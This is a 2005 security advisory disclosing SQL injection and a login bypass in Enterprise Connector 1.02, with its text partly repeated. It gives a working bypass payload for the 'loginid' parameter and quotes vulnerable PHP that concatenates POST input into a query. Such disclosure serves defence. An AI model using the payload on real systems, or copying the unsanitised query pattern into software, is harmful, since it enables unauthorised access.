Enterprise Connector v.1.02 Multiple SQL Vulnerabilities and Login Bypass
Author: Attila Gerendi (Darkz)
Date: December 20, 2005
Package: Enterprise Connector (http://www.enterpriseheart.com/site/modules/mydownloads/)
Versions Affected: 1.02 (Other versions may also be affected.)
Severity: SQL Injection, Login Bypass
Description:
Some of this SQL injection vulnerabilities are already reported at:
http://secunia.com/advisories/17743/
A new SQL vulnerability not listed in the previous report:
Input passed to the "loginid" parameter in "main.php" isn't properly sanitised before being used in
a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and
bypass login sequence.
There may be more SQL injection vulnerabilities there.
The Author was contacted via home page "contact us" module at December 8 2005, no response given.
Solution:
Enterprise Connector development seen to be suspended by now. No new release 2004/4/27.
You may edit the source code to ensure that input is properly sanitised.
Author: Attila Gerendi (Darkz)
Date: December 20, 2005
Package: Enterprise Connector (http://www.enterpriseheart.com/site/modules/mydownloads/)
Versions Affected: 1.02 (Other versions may also be affected.)
Severity: SQL Injection, Login Bypass
Description:
Some of this SQL injection vulnerabilities are already reported at:
http://secunia.com/advisories/17743/
A new SQL vulnerability not listed in the previous report:
Input passed to the "loginid" parameter in "main.php" isn't properly sanitised before being used in
a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and
bypass login sequence.
Login Bypass Example:
username 'or isnull(1/0) /*
password (no password required)
or just simply call main.php with POST_PARAMETER loginid='or isnull(1/0) /*
Vulnerable code piece:
$sql = "SELECT userid, companyid, departmentid, status, languagefile FROM connector_user WHERE ";
$sql .= "userid = '" . $_POST['loginid'] . "' ";
$sql .= " AND password = '" . $_POST['password'] . "'";
$result = sql_execute($sql);
There may be more SQL injection vulnerabilities there.
The Author was contacted via home page "contact us" module at December 8 2005, no response given.
Solution:
Enterprise Connector development seen to be suspended by now. No new release 2004/4/27.
You may edit the source code to ensure that input is properly sanitised.
[ reply ]